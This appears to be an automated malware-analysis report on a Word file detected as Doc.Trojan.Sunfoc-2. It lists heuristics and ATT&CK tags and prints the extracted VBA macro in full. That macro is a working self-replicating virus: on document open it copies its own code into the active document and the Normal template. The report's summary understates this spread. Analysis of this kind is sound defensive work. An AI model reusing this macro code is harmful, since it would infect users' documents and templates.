MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The Document_Open macro is designed to overwrite the current document with its own code and save it, a technique often used to maintain persistence or prepare for payload delivery. The ClamAV detection 'Doc.Trojan.Sunfoc-2' further supports its malicious nature.
Heuristics 3
-
ClamAV: Doc.Trojan.Sunfoc-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Sunfoc-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 811 bytes |
SHA-256: 52e49e8bad8b1ff18b54aa5602a4f35f9a047be3396e87613ed715b8344aa1fb |
|||
|
Detection
ClamAV:
Doc.Trojan.Sunfoc-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Application.EnableCancelKey = wdCancelDisabled Options.VirusProtection = Yes Options.SaveNormalPrompt = Yes Options.ConfirmConversions = Yes For A = 1 To 3 If A = 1 Then Set B = ThisDocument Else If A = 2 Then Set B = ActiveDocument Else If A = 3 Then Set B = NormalTemplate Set C = B.VBProject.VBComponents.Item(1).CodeModule If A = 1 Then D = C.Lines(1, C.CountOfLines) If A <> 1 Then C.DeleteLines 1, C.CountOfLines If A <> 1 Then C.Addfromstring D Next ActiveDocument.SaveAs FileName:=ActiveDocument.FullName End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.